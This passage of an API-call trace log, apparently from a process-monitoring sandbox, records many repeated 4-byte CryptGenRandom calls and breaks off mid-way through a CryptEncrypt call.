pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.437] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.438] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.439] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.440] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, 